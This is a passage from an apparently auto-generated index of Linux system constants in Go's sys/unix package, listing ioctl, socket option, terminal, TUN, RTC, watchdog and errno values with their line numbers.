204) | PPPIOCCONNECT = 0x4004743a constant PPPIOCDETACH (line 205) | PPPIOCDETACH = 0x4004743c constant PPPIOCDISCONN (line 206) | PPPIOCDISCONN = 0x7439 constant PPPIOCGASYNCMAP (line 207) | PPPIOCGASYNCMAP = 0x80047458 constant PPPIOCGCHAN (line 208) | PPPIOCGCHAN = 0x80047437 constant PPPIOCGDEBUG (line 209) | PPPIOCGDEBUG = 0x80047441 constant PPPIOCGFLAGS (line 210) | PPPIOCGFLAGS = 0x8004745a constant PPPIOCGIDLE (line 211) | PPPIOCGIDLE = 0x8010743f constant PPPIOCGIDLE32 (line 212) | PPPIOCGIDLE32 = 0x8008743f constant PPPIOCGIDLE64 (line 213) | PPPIOCGIDLE64 = 0x8010743f constant PPPIOCGL2TPSTATS (line 214) | PPPIOCGL2TPSTATS = 0x80487436 constant PPPIOCGMRU (line 215) | PPPIOCGMRU = 0x80047453 constant PPPIOCGRASYNCMAP (line 216) | PPPIOCGRASYNCMAP = 0x80047455 constant PPPIOCGUNIT (line 217) | PPPIOCGUNIT = 0x80047456 constant PPPIOCGXASYNCMAP (line 218) | PPPIOCGXASYNCMAP = 0x80207450 constant PPPIOCSACTIVE (line 219) | PPPIOCSACTIVE = 0x40107446 constant PPPIOCSASYNCMAP (line 220) | PPPIOCSASYNCMAP = 0x40047457 constant PPPIOCSCOMPRESS (line 221) | PPPIOCSCOMPRESS = 0x4010744d constant PPPIOCSDEBUG (line 222) | PPPIOCSDEBUG = 0x40047440 constant PPPIOCSFLAGS (line 223) | PPPIOCSFLAGS = 0x40047459 constant PPPIOCSMAXCID (line 224) | PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 225) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 226) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 227) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 228) | PPPIOCSPASS = 0x40107447 constant PPPIOCSRASYNCMAP (line 229) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 230) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 231) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 232) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 233) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_SYSEMU (line 234) | PTRACE_SYSEMU = 0x1f constant PTRACE_SYSEMU_SINGLESTEP (line 235) | PTRACE_SYSEMU_SINGLESTEP = 0x20 constant RLIMIT_AS (line 236) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 237) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 238) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 239) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 240) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 241) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 242) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 243) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 244) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 245) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 246) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 247) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 248) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 249) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 250) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 251) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 252) | RTC_EPOCH_READ = 0x8008700d constant RTC_EPOCH_SET (line 253) | RTC_EPOCH_SET = 0x4008700e constant RTC_IRQP_READ (line 254) | RTC_IRQP_READ = 0x8008700b constant RTC_IRQP_SET (line 255) | RTC_IRQP_SET = 0x4008700c constant RTC_PARAM_GET (line 256) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 257) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 258) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 259) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 260) | RTC_PLL_GET = 0x80207011 constant RTC_PLL_SET (line 261) | RTC_PLL_SET = 0x40207012 constant RTC_RD_TIME (line 262) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 263) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 264) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 265) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 266) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 267) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 268) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 269) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 270) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 271) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 272) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 273) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 274) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 275) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 276) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 277) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 278) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 279) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 280) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 281) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 282) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 283) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 284) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 285) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 286) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 287) | SIOCINQ = 0x541b constant SIOCOUTQ (line 288) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 289) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 290) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 291) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 292) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 293) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 294) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 295) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 296) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 297) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 298) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 299) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 300) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 301) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 302) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 303) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 304) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 305) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 306) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 307) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 308) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 309) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 310) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 311) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 312) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 313) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 314) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 315) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 316) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 317) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 318) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 319) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 320) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 321) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 322) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 323) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 324) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 325) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 326) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 327) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 328) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 329) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 330) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 331) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 332) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 333) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 334) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 335) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 336) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 337) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 338) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 339) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 340) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 341) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 342) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 343) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 344) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 345) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 346) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 347) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 348) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 349) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 350) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 351) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 352) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 353) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 354) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 355) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 356) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 357) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 358) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 359) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 360) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 361) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 362) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 363) | SO_TXTIME = 0x3d constant SO_TYPE (line 364) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 365) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 366) | SO_ZEROCOPY = 0x3c constant TAB1 (line 367) | TAB1 = 0x800 constant TAB2 (line 368) | TAB2 = 0x1000 constant TAB3 (line 369) | TAB3 = 0x1800 constant TABDLY (line 370) | TABDLY = 0x1800 constant TCFLSH (line 371) | TCFLSH = 0x540b constant TCGETA (line 372) | TCGETA = 0x5405 constant TCGETS (line 373) | TCGETS = 0x5401 constant TCGETS2 (line 374) | TCGETS2 = 0x802c542a constant TCGETX (line 375) | TCGETX = 0x5432 constant TCSAFLUSH (line 376) | TCSAFLUSH = 0x2 constant TCSBRK (line 377) | TCSBRK = 0x5409 constant TCSBRKP (line 378) | TCSBRKP = 0x5425 constant TCSETA (line 379) | TCSETA = 0x5406 constant TCSETAF (line 380) | TCSETAF = 0x5408 constant TCSETAW (line 381) | TCSETAW = 0x5407 constant TCSETS (line 382) | TCSETS = 0x5402 constant TCSETS2 (line 383) | TCSETS2 = 0x402c542b constant TCSETSF (line 384) | TCSETSF = 0x5404 constant TCSETSF2 (line 385) | TCSETSF2 = 0x402c542d constant TCSETSW (line 386) | TCSETSW = 0x5403 constant TCSETSW2 (line 387) | TCSETSW2 = 0x402c542c constant TCSETX (line 388) | TCSETX = 0x5433 constant TCSETXF (line 389) | TCSETXF = 0x5434 constant TCSETXW (line 390) | TCSETXW = 0x5435 constant TCXONC (line 391) | TCXONC = 0x540a constant TFD_CLOEXEC (line 392) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 393) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 394) | TIOCCBRK = 0x5428 constant TIOCCONS (line 395) | TIOCCONS = 0x541d constant TIOCEXCL (line 396) | TIOCEXCL = 0x540c constant TIOCGDEV (line 397) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 398) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 399) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 400) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 401) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 402) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 403) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 404) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 405) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 406) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 407) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 408) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 409) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 410) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 411) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 412) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 413) | TIOCINQ = 0x541b constant TIOCLINUX (line 414) | TIOCLINUX = 0x541c constant TIOCMBIC (line 415) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 416) | TIOCMBIS = 0x5416 constant TIOCMGET (line 417) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 418) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 419) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 420) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 421) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 422) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 423) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 424) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 425) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 426) | TIOCM_SR = 0x10 constant TIOCM_ST (line 427) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 428) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 429) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 430) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 431) | TIOCPKT = 0x5420 constant TIOCSBRK (line 432) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 433) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 434) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 435) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 436) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 437) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 438) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 439) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 440) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 441) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 442) | TIOCSETD = 0x5423 constant TIOCSIG (line 443) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 444) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 445) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 446) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 447) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 448) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 449) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 450) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 451) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 452) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 453) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 454) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 455) | TUNATTACHFILTER = 0x401054d5 constant TUNDETACHFILTER (line 456) | TUNDETACHFILTER = 0x401054d6 constant TUNGETDEVNETNS (line 457) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 458) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 459) | TUNGETFILTER = 0x801054db constant TUNGETIFF (line 460) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 461) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 462) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 463) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 464) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 465) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 466) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 467) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 468) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 469) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 470) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 471) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 472) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 473) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 474) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 475) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 476) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 477) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 478) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 479) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 480) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 481) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 482) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 483) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 484) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 485) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 486) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 487) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 488) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 489) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 490) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 491) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 492) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 493) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 494) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 495) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 496) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 497) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 498) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 499) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 500) | VDISCARD = 0xd constant VEOF (line 501) | VEOF = 0x4 constant VEOL (line 502) | VEOL = 0xb constant VEOL2 (line 503) | VEOL2 = 0x10 constant VMIN (line 504) | VMIN = 0x6 constant VREPRINT (line 505) | VREPRINT = 0xc constant VSTART (line 506) | VSTART = 0x8 constant VSTOP (line 507) | VSTOP = 0x9 constant VSUSP (line 508) | VSUSP = 0xa constant VSWTC (line 509) | VSWTC = 0x7 constant VT1 (line 510) | VT1 = 0x4000 constant VTDLY (line 511) | VTDLY = 0x4000 constant VTIME (line 512) | VTIME = 0x5 constant VWERASE (line 513) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 514) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 515) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 516) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 517) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 518) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 519) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 520) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 521) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 522) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 523) | WORDSIZE = 0x40 constant XCASE (line 524) | XCASE = 0x4 constant XTABS (line 525) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 526) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 527) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 528) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 533) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 534) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 535) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 536) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 537) | EALREADY = syscall.Errno(0x72) constant EBADE (line 538) | EBADE = syscall.Errno(0x34) constant EBADFD (line 539) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 540) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 541) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 542) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 543) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 544) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 545) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 546) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 547) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 548) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 549) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 550) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 551) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 552) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 553) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 554) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 555) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 556) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 557) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 558) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 559) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 560) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 561) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 562) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 563) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 564) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 565) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 566) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 567) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 568) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 569) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 570) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 571) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 572) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 573) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 574) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 575) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 576) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 577) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 578) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 579) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 580) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 581) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 582) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 583) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 584) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 585) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 586) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 587) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 588) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 589) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 590) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 591) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 592) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 593) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 594) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 595) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 596) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 597) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 598) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 599) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 600) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 601) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 602) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 603) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 604) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 605) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 606) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 607) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 608) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 609) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 610) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 611) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 612) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 613) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 614) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 615) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 616) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 617) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 618) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 619) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 620) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT 